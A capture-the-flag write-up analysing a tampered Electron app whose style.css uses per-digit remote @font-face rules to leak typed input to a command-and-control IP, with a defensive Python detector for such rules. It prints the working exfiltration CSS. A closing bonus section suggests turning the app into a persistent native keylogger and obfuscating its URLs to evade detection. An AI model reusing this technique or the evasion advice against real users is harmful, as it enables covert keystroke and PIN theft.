Hello Penetration Testers,
This is our writeup for the ASC 2018 Cyber Wargames "Qualification Phase".

Task one: find out what is going wrong with the downloaded app.

- Electron is a JS framework used to build desktop apps on Linux and Windows as well.

- By comparing the MD5 hashes with the original MD5 hashes from
GitHub: https://github.com/electron/electron/releases/tag/v2.0.0
we found that 90% of the app is safe, since those files are an exact match with the author's release.

Task two: write a writeup about the malicious functionality and how you found it.

- However, the other 10% is malicious...
I executed the file and, in another terminal window,
ran ps -ax to get the process PID.

Then I ran
cat /proc/{pid}/maps

- While reading it I found something: "/root/.config/wargames2018/"
- I analyzed the files in that path and found requests to servers.

- Since all Electron apps are packed with asar, it can be unpacked without any problems.

- By extracting the `resources/app.asar` file we found that
the app sends malicious requests to the following IP: "142.93.106.129"

(1) /resources/app/index.html
|_> http://142.93.106.129/0000
|_> http://142.93.106.129/0001
|_> http://142.93.106.129/0010
|_> http://142.93.106.129/0011
|_> http://142.93.106.129/0100
|_> http://142.93.106.129/0101
|_> http://142.93.106.129/0110
|_> http://142.93.106.129/0111
|_> http://142.93.106.129/1000
|_> http://142.93.106.129/1001

(2) /resources/app/style.css
|_> http://142.93.106.129/log?a
|_> http://142.93.106.129/log?b
|_> http://142.93.106.129/log?c
|_> http://142.93.106.129/log?d

By decoding the binary path names from set (1), each path is one decimal digit:
|_> http://142.93.106.129/0
|_> http://142.93.106.129/1
|_> http://142.93.106.129/2
|_> http://142.93.106.129/3
|_> http://142.93.106.129/4
|_> http://142.93.106.129/5
|_> http://142.93.106.129/6
|_> http://142.93.106.129/7
|_> http://142.93.106.129/8
|_> http://142.93.106.129/9

After looking at the following code in style.css:

@font-face { font-family: x; src: url(http://142.93.106.129/0000); unicode-range: U+30; }
@font-face { font-family: x; src: url(http://142.93.106.129/0001); unicode-range: U+31; }
@font-face { font-family: x; src: url(http://142.93.106.129/0010); unicode-range: U+32; }
@font-face { font-family: x; src: url(http://142.93.106.129/0011); unicode-range: U+33; }
@font-face { font-family: x; src: url(http://142.93.106.129/0100); unicode-range: U+34; }
@font-face { font-family: x; src: url(http://142.93.106.129/0101); unicode-range: U+35; }
@font-face { font-family: x; src: url(http://142.93.106.129/0110); unicode-range: U+36; }
@font-face { font-family: x; src: url(http://142.93.106.129/0111); unicode-range: U+37; }
@font-face { font-family: x; src: url(http://142.93.106.129/1000); unicode-range: U+38; }
@font-face { font-family: x; src: url(http://142.93.106.129/1001); unicode-range: U+39; }

The C2 server is 142.93.106.129
and the path is just the binary encoding of the digits 0-9 (unicode-range U+30 to U+39).
The font is then applied to input fields, so every distinct digit typed makes the renderer fetch that glyph's "font" from the server, which leaks the user's input:

input { font-family: x; }

So for example:
if the user types the PIN 1234,
by applying this filter in Wireshark
" http && ip.addr == 142.93.106.129 "
and starting to type the PIN,
we can see the HTTP requests to the server:

GET /0001 HTTP/1.1

GET /0010 HTTP/1.1

GET /0011 HTTP/1.1

GET /0100 HTTP/1.1

0001 0010 0011 0100 = 1234
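The following script is an added defensive check and is not part of the original writeup: it scans a stylesheet for the pattern above, @font-face rules whose src is a remote URL and whose unicode-range covers exactly one code point, and reports which selectors apply that family. The sample CSS is constructed to mirror the page's style.css (the IP is the one quoted in the writeup); the local font "y" is a benign control.

```python
import re
from urllib.parse import urlparse

# Constructed sample modelled on the writeup's style.css, not the original file.
SAMPLE_CSS = """
@font-face { font-family: x; src: url(http://142.93.106.129/0000); unicode-range: U+30; }
@font-face { font-family: x; src: url(http://142.93.106.129/0001); unicode-range: U+31; }
@font-face { font-family: x; src: url(http://142.93.106.129/1001); unicode-range: U+39; }
@font-face { font-family: y; src: url(fonts/local.woff2); unicode-range: U+0000-00FF; }
input { font-family: x; }
"""

FONT_FACE_RE = re.compile(r"@font-face\s*\{([^}]*)\}")
DECL_RE = re.compile(r"([a-z-]+)\s*:\s*([^;]+);?")
URL_RE = re.compile(r"url\(\s*['\"]?([^'\")]+)['\"]?\s*\)")
RULE_RE = re.compile(r"([^{}@]+)\{([^}]*)\}")

def declarations(body):
    """Split a rule body into a {property: value} dict."""
    return {k.strip(): v.strip() for k, v in DECL_RE.findall(body)}

def single_codepoint(unicode_range):
    """Return the code point if the range covers exactly one character, else None."""
    m = re.fullmatch(r"U\+([0-9A-Fa-f]+)", unicode_range.strip())
    return int(m.group(1), 16) if m else None

def find_exfil_fonts(css):
    """Map font-family -> [(char, url)] for faces that fetch a remote URL for a
    single code point: one network request per distinct character rendered."""
    suspects = {}
    for block in FONT_FACE_RE.finditer(css):
        decls = declarations(block.group(1))
        cp = single_codepoint(decls.get("unicode-range", ""))
        m = URL_RE.search(decls.get("src", ""))
        if "font-family" not in decls or cp is None or not m:
            continue
        if urlparse(m.group(1)).scheme in ("http", "https"):
            suspects.setdefault(decls["font-family"], []).append((chr(cp), m.group(1)))
    return suspects

def selectors_using(css, family):
    """Selectors whose font-family names `family`, i.e. where the leak is armed."""
    plain = FONT_FACE_RE.sub("", css)  # drop @font-face blocks, keep style rules
    return [sel.strip() for sel, body in RULE_RE.findall(plain)
            if family in re.split(r"\s*,\s*", declarations(body).get("font-family", ""))]

if __name__ == "__main__":
    for fam, pairs in find_exfil_fonts(SAMPLE_CSS).items():
        print(f"font-family {fam!r} is applied by {selectors_using(SAMPLE_CSS, fam)}")
        for ch, url in pairs:
            print(f"  rendering {ch!r} fetches {url}")
```

Run it against the extracted app.asar contents (or any stylesheet from a packaged app) to flag per-character remote font rules before they reach an input field.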

Task Three: Bonus and Improving

#1
- You can create a keylogger and bind it with the Electron app, because a keylogger written in C or C++ is better than a keylogger with cache and JavaScript.
- By step 1, the keylogger will always be connected to a server like Trojans, e.g. nJRAT; that is better than the app sending requests with cached keystrokes every 3 minutes.

#2
This can be improved by using JavaScript to obfuscate the URLs and inject them, to make it a little harder to find.

#3
https://www.shodan.io/host/142.93.106.129
Host "142.93.106.129" is running an outdated version of Apache 2.4.7
with an open SSH port.

Best,
Youssef
